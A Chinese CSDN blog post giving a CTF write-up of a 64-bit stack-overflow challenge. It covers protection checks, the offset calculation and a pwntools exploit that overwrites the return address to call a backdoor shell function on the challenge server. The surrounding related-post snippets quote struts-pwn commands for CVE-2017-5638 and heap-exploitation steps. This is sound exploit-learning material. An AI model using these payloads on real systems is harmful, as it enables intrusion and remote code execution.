pwn刷题num14-----栈溢出

tbsqigongzi

已于 2022-04-22 20:46:26 修改

阅读量128

点赞数

分类专栏： pwn CTF 攻防世界文章标签：系统安全 python 网络安全 c语言安全

于 2022-04-22 20:15:07 首次发布

本文链接：https://blog.csdn.net/tbsqigongzi/article/details/124353993

版权

pwn 同时被 3 个专栏收录

67 篇文章 5 订阅

订阅专栏

CTF

61 篇文章 1 订阅

订阅专栏

攻防世界

17 篇文章 0 订阅

订阅专栏

攻防世界pwn进阶区反应釜开关控制

在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

64位，小端序
开启部分RELRO---got表仍可写
未开启canary保护---存在栈溢出
开启NX保护----注入的shellcode不可执行
未开启PIE----程序地址为真实地址
动态链接

ida一下
在这里插入图片描述
发现栈溢出（灰色部分）
查看栈区，v5距离返回地址0x208字节(0x200+0x8)

查找有没有后门函数，发现一个shell函数

在这里插入图片描述
exp

from pwn import *
context(os = 'linux',endian = 'little',arch = 'amd64',log_level = 'debug')
sh = remote('111.200.241.244',60132)
shell = 0x4005F6
payload = flat(['a' * 0x208,p64(shell)])
sh.sendline(payload)
sh.interactive()

运行获得flag
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

tbsqigongzi

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

CTF-浅尝64位栈溢出PWN

BadRer的博客

06-04

1万+

干了一早上终于把这道’难题’做出来了，实在是不容易。头一次完完全全的做出64位的pwn题，如果就栈溢出来说的话，其实感觉和32位的也差不多。至少这方面没有遇到太大的困难，做64位的题对汇编指令的要求就更高了。正好一边做题，一边多学点汇编。收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着，一直没有跳到真正产生漏洞的地方，好不容易跳过去了，结果被我自己坑了(写脚本的时候，没有考虑缓冲区的影响，经常

BUUCTF-pwn刷题记录（22-7-30更新）

Morphy_Amo的博客

03-04

4330

BUUCTF刷题记录

参与评论您还未登录，请先登录后发表或查看评论

pwn栈溢出基础练习题——2

qq_41696518的博客

07-06

331

pwn栈溢出练习，所有题目在练习题——1中

PWN入门学习之简单的栈溢出

最新发布

2301_80718478的博客

06-28

672

栈溢出是PWN的一种最简单的漏洞，其最核心的点就是，程序在读取用户输入的时候没有对输入内容进行检测与限制，从而导致输入的数据写入内存时挤占了其它不属于该变量的内存位置，从而导致重要寄存器（如RBP、RIP）中记录的地址被破坏，导致函数执行完返回时发生错误（找不到这样一个地址），即发生段错误（Segment fault）。但是同时，我们可以利用改写RBP、RIP寄存器值的这一特性，将程序跳转至我们期望的地方去。

简单的练手栈溢出题 pwn100-附件资源

03-02

简单的练手栈溢出题 pwn100-附件资源

pwn刷题num23----栈溢出

tbsqigongzi的博客

04-26

162

BUUCTF-PWN-jarvisoj_level0 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序，小端序未开启RELRO-----got表可写未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行未开启PIE-----程序地址为真实地址动态链接 ida一下程序首先用write函数输出了一个Hello，World，又调用了一个函数明显的栈溢出，buf占0x80字节，而read函数要读取0x200字节，可以覆盖返回地址

mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务

05-02

MQTT-PWN MQTT是一种机器对机器的连接协议，被设计为一种极其轻量级的发布/订阅消息传递，并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店，因为它结合了枚举...

谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用

06-30

谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具大家好，我正在使用 Pwn Pad 2013（适用于 2012 版 Nexus 7 平板电脑）。这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。希望它会对某人有所...

BUUCTF-PWN刷题记录-21

weixin_44145820的博客

05-15

686

目录wdb_2018_1st_babyheap（unlink, UAF） wdb_2018_1st_babyheap（unlink, UAF） add的大小固定为0x20 edit机会只有三次指针悬挂利用思路如下：进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1，再删除一次0，此时show(0)能泄露出heap的地址

struts-pwn:Apache Struts CVE-2017-5638的漏洞利用

05-18

python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...

Mary_Morton write up（pwn 64位格式化字符串和栈溢出

weixin_43742794的博客

08-06

848

Morton.dms 首先用gdb（已安装peda）打开文件用checksec检查可执行文件属性 CANNARY(栈保护) 即是否在栈中插入了cookie（linux中称为canary FORTIFY 防止缓冲区溢出攻击不常见 NX（Windows平台上称其为DEP）即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入she...

pwn刷题num19----栈溢出

tbsqigongzi的博客

04-24

483

BUUCTF-PWN-rip 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序，小端序开启部分RELRO-----got表可写未开启NX保护-----堆栈可执行未开启PIE-----程序地址为真实地址 RWX----有可读可写可执行段动态链接 ida一下，看一下主函数这里的gets(&s, argv); gets第一个参数是要输出的字符串首地址，第二个参数是输出的字符串的长度 s占0xf个字节，这里argv的值是未知的，但这个程序能利用的也只

pwn刷题num20----栈溢出

tbsqigongzi的博客

04-25

173

BUUCTF-PWN-warmup_csaw_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序，小端序开启部分RELRO-----got表可写未开启canary保护-----可能存在栈溢出 未开启NX保护-----堆栈可执行未开启PIE-----程序地址为真实地址 RWX----有可读可写可执行段动态链接程序运行后告诉我们一个地址0x40060d ida一下看一下伪代码主函数里有一个sprintf注意一下 sprintf(&s, "%

pwn学习笔记（一）（32位和64位的栈溢出）

weixin_43742794的博客

08-05

2474

32位 32位的栈帧是这样的 栈溢出基本思路是覆盖掉返回地址和参数，执行system（）函数从而/bin/sh拿到flag 64位 64位的栈帧也是这样的但是在 Linux 上，前六个参数通过 RDI 、 RSI 、 RDX 、 RCX 、 R8 和 R9 传递；而在 Windows 中，前四个参数通过 RCX 、 RDX 、 R8 和 R9 来传递而第七个（windows下第五个）参数才p...

CTFshow-PWN-栈溢出（pwn40）

Welcome To Myon'Blog !

04-24

788

在64位的Linux系统中，参数传递是通过寄存器来完成的，而 system 函数的第一个参数（即需要执行的命令字符串）是通过 rdi 寄存器传递的，所以，我们首先需要将 /bin/sh 字符串的地址放入 rdi 寄存器中，然后才能调用system函数，这就是为什么我们需要知道 pop rdi;--only "pop|ret": 指定了只查找包含"pop"和"ret"指令序列的代码片段，这些指令通常用于弹出寄存器中的值，并将控制流返回到调用函数的地址处，是ROP攻击中常用的gadgets。

第一道pwn栈溢出题

小白垃圾笔记2

03-03

901

代码和解题思路来自启明星辰的《ctf安全竞赛入门》，当然还有好多热心的师傅们的指导。

pwn刷题num1---栈溢出

tbsqigongzi的博客

04-21

1553

攻防世界pwn新手区—level0 111.200.241.244:49418是ip地址:端口，通过linux的nc命令可扫描ip地址并连接到ip地址对应靶机的端口程序上 linux的nc命令附件是把靶机的程序直接给出到本地下载题目附件后首先赋予程序执行权限一般下载的程序没有可执行权限，无法进行分析，所以要先赋予可执行权限，命令是 chmod +x 文件名 linux文件属性之后用checksec命令查保护（需先配置pwntools这里引用另一个博主的配置pwn环境的博客）关于linux的保

攻防世界pwn-forgot

08-10

- *2* *3* [攻防世界：PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...